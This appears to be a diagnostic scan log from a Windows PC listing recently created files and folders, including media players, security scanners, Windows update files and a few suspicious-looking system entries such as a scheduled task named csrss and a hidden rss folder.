2020-01-26 19:07 - 2020-01-26 19:07 - 000069168 _____ (Bitvise Limited) C:\Windows\MstscTitle32.dll
2020-01-26 19:07 - 2020-01-26 19:07 - 000002421 _____ C:\Users\Public\Desktop\Bitvise SSH Client.lnk
2020-01-26 19:07 - 2020-01-26 19:07 - 000002421 _____ C:\ProgramData\Desktop\Bitvise SSH Client.lnk
2020-01-26 19:07 - 2020-01-26 19:07 - 000000000 ____D C:\Users\Jomko\AppData\Local\Bitvise
2020-01-26 19:07 - 2020-01-26 19:07 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bitvise SSH Client
2020-01-26 19:07 - 2020-01-26 19:07 - 000000000 ____D C:\Program Files (x86)\Bitvise SSH Client
2020-01-26 15:54 - 2020-01-26 15:54 - 000000000 ____D C:\Users\Jomko\AppData\Roaming\Google
2020-01-25 00:49 - 2020-01-25 00:49 - 000000000 ____D C:\Windows\pss
2020-01-25 00:24 - 2020-01-25 00:24 - 000003158 _____ C:\Windows\system32\Tasks\{E0E271FE-355F-411F-8E13-4141203B01DE}
2020-01-25 00:22 - 2020-01-25 00:45 - 000000000 ____D C:\ProgramData\Malwarebytes
2020-01-25 00:21 - 2020-01-25 00:21 - 000000000 ____D C:\Program Files\Malwarebytes
2020-01-24 21:54 - 2020-01-24 21:54 - 000389624 _____ C:\Windows\Minidump\012420-10249-01.dmp
2020-01-22 23:59 - 2020-01-22 23:59 - 000001617 _____ C:\Users\Jomko\Desktop\Kodi.lnk
2020-01-22 23:07 - 2020-01-26 18:25 - 000000000 ____D C:\Users\Jomko\AppData\Roaming\Kodi
2020-01-22 23:06 - 2020-01-22 23:06 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Kodi
2020-01-22 23:06 - 2020-01-22 23:06 - 000000000 ____D C:\Program Files\Kodi
2020-01-22 22:54 - 2020-01-24 21:00 - 000000000 ____D C:\Users\Jomko\AppData\Roaming\vlc
2020-01-22 22:51 - 2020-01-22 22:51 - 000000840 _____ C:\Users\Public\Desktop\VLC media player.lnk
2020-01-22 22:51 - 2020-01-22 22:51 - 000000840 _____ C:\ProgramData\Desktop\VLC media player.lnk
2020-01-22 22:51 - 2020-01-22 22:51 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN
2020-01-22 22:50 - 2020-01-22 22:50 - 000000000 ____D C:\Program Files\VideoLAN
2020-01-22 20:46 - 2020-01-22 20:47 - 000000000 ___SD C:\32788R22FWJFW
2020-01-22 20:28 - 2020-01-22 20:28 - 000034489 _____ C:\ComboFix.txt
2020-01-22 17:55 - 2020-01-22 20:47 - 000000000 ____D C:\Windows\erdnt
2020-01-22 17:29 - 2020-01-22 17:33 - 142164912 _____ (Microsoft Corporation) C:\Users\Jomko\Downloads\MSERT.exe
2020-01-22 17:20 - 2020-01-22 17:24 - 000000000 ____D C:\ProgramData\ESET
2020-01-22 17:20 - 2020-01-22 17:24 - 000000000 ____D C:\Program Files\ESET
2020-01-22 17:17 - 2020-01-22 17:17 - 005504960 _____ (ESET) C:\Users\Jomko\Downloads\eset_smart_security_premium_live_installer_rt_sk.exe
2020-01-22 15:00 - 2020-01-22 15:00 - 000335528 _____ C:\Windows\Minidump\012220-10062-01.dmp
2020-01-22 14:31 - 2020-01-22 14:31 - 000000000 __SHD C:\ProgramData\x86_microsoft-windows-d..directplay4-payload_31bf3856ad364e35_1.0.18362.1_none_148c99f79b506e6c
2020-01-22 14:31 - 2020-01-22 14:31 - 000000000 ____D C:\Windows\system32\Tasks\U-9-6-42-1263061080-1218707829-1038753275-4479
2020-01-22 14:29 - 2020-02-07 20:45 - 000003182 _____ C:\Windows\system32\Tasks\csrss
2020-01-22 14:29 - 2020-01-22 17:00 - 000000000 ___HD C:\Windows\rss
2020-01-22 14:29 - 2020-01-22 14:30 - 005553888 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
2020-01-22 14:29 - 2020-01-22 14:30 - 000629984 _____ (Microsoft Corporation) C:\Windows\system32\osloader.exe
2020-01-22 14:28 - 2020-01-22 14:28 - 000000000 _____ C:\Users\Jomko\Documents\codec m3u vlc
2020-01-22 12:39 - 2020-01-22 22:40 - 000000000 ____D C:\Program Files (x86)\VideoLAN
2020-01-22 10:49 - 2020-01-22 14:41 - 000000000 ____D C:\Program Files\Mozilla Firefox
2020-01-21 11:01 - 2020-01-21 11:01 - 008000936 _____ (Tim Kosse) C:\Users\Jomko\Downloads\FileZilla_3.46.3_win64-setup.exe
2020-01-16 13:58 - 2020-01-16 13:58 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Logitech
2020-01-16 13:57 - 2020-01-16 13:57 - 000000000 ____D C:\Program Files\Logitech
2020-01-16 00:57 - 2020-01-16 00:57 - 000000000 ____D C:\Windows\rescache
2020-01-15 23:25 - 2019-12-31 03:40 - 000123904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\poqexec.exe
2020-01-15 23:25 - 2019-12-31 03:32 - 000142336 _____ (Microsoft Corporation) C:\Windows\system32\poqexec.exe
2020-01-15 21:37 - 2020-01-03 04:42 - 004061624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2020-01-15 21:37 - 2020-01-03 04:42 - 003967416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2020-01-15 21:37 - 2020-01-03 04:41 - 001320248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 001114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000834048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user32.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000555520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000275968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000261632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000082944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcrypt.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000070144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2020-01-15 21:37 - 2020-01-03 04:38 - 000005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 005553888 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2020-01-15 21:37 - 2020-01-03 04:37 - 000709856 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2020-01-15 21:37 - 2020-01-03 04:37 - 000690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000627424 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2020-01-15 21:37 - 2020-01-03 04:37 - 000342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000263904 _____ (Microsoft Corporation) C:\Windows\system32\hal.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000096992 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2020-01-15 21:37 - 2020-01-03 04:37 - 000050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:36 - 000155360 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2020-01-15 21:37 - 2020-01-03 04:35 - 001671296 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 001472512 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 001211392 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 001162752 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 001010688 _____ (Microsoft Corporation) C:\Windows\system32\user32.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000733184 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000408576 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000361984 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000316928 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000236032 _____ (Microsoft Corporation) C:\Windows\system32\srvsvc.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000123904 _____ (Microsoft Corporation) C:\Windows\system32\bcrypt.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000094208 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000013312 _____ (Microsoft Corporation) C:\Windows\system32\sscore.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000007168 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:10 - 000009728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sscore.dll
2020-01-15 21:37 - 2020-01-03 04:09 - 000050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2020-01-15 21:37 - 2020-01-03 04:05 - 000148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2020-01-15 21:37 - 2020-01-03 04:05 - 000062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2020-01-15 21:37 - 2020-01-03 04:05 - 000017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2020-01-15 21:37 - 2020-01-03 04:04 - 000064512 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2020-01-15 21:37 - 2020-01-03 04:04 - 000025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2020-01-15 21:37 - 2020-01-03 04:04 - 000014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2020-01-15 21:37 - 2020-01-03 04:04 - 000007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2020-01-15 21:37 - 2020-01-03 04:04 - 000002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2020-01-15 21:37 - 2020-01-03 04:02 - 000036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2020-01-15 21:37 - 2020-01-03 04:02 - 000006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:02 - 000004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:02 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:02 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:01 - 000338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2020-01-15 21:37 - 2020-01-03 04:01 - 000129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\videoprt.sys
2020-01-15 21:37 - 2020-01-03 04:00 - 000296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2020-01-15 21:37 - 2020-01-03 03:57 - 000464384 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2020-01-15 21:37 - 2020-01-03 03:57 - 000406016 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2020-01-15 21:37 - 2020-01-03 03:57 - 000291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2020-01-15 21:37 - 2020-01-03 03:57 - 000169984 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2020-01-15 21:37 - 2020-01-03 03:57 - 000161280 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2020-01-15 21:37 - 2020-01-03 03:56 - 000129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2020-01-15 21:37 - 2020-01-03 03:55 - 000112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2020-01-15 21:37 - 2020-01-03 03:55 - 000064512 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\amdk8.sys
2020-01-15 21:37 - 2020-01-03 03:55 - 000062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\intelppm.sys
2020-01-15 21:37 - 2020-01-03 03:55 - 000060928 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\processr.sys
2020-01-15 21:37 - 2020-01-03 03:55 - 000060928 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\amdppm.sys
2020-01-15 21:37 - 2020-01-03 03:55 - 000044544 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\npfs.sys
2020-01-15 21:37 - 2020-01-03 03:55 - 000030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2020-01-15 21:37 - 2019-12-31 04:04 - 000492032 _____ (Microsoft Corporation) C:\Windows\system32\EOSNotify.exe
2020-01-15 21:37 - 2019-12-18 18:45 - 000390536 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2020-01-15 21:37 - 2019-12-18 17:48 - 000341896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2020-01-15 21:37 - 2019-12-17 03:39 - 025754624 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2020-01-15 21:37 - 2019-12-17 02:18 - 002724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2020-01-15 21:37 - 2019-12-17 02:18 - 000004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2020-01-15 21:37 - 2019-12-17 02:06 - 002910720 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2020-01-15 21:37 - 2019-12-17 02:04 - 000580096 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2020-01-15 21:37 - 2019-12-17 02:04 - 000417280 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2020-01-15 21:37 - 2019-12-17 02:04 - 000066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2020-01-15 21:37 - 2019-12-17 02:04 - 000048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2020-01-15 21:37 - 2019-12-17 02:03 - 000088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2020-01-15 21:37 - 2019-12-17 01:57 - 000054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2020-01-15 21:37 - 2019-12-17 01:56 - 000034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2020-01-15 21:37 - 2019-12-17 01:54 - 000615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2020-01-15 21:37 - 2019-12-17 01:53 - 005500928 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2020-01-15 21:37 - 2019-12-17 01:52 - 020290048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2020-01-15 21:37 - 2019-12-17 01:52 - 000814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2020-01-15 21:37 - 2019-12-17 01:52 - 000797184 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2020-01-15 21:37 - 2019-12-17 01:52 - 000144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2020-01-15 21:37 - 2019-12-17 01:52 - 000116224 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2020-01-15 21:37 - 2019-12-17 01:49 - 002724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2020-01-15 21:37 - 2019-12-17 01:45 - 000969216 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2020-01-15 21:37 - 2019-12-17 01:42 - 000489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2020-01-15 21:37 - 2019-12-17 01:37 - 000496640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2020-01-15 21:37 - 2019-12-17 01:37 - 000062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
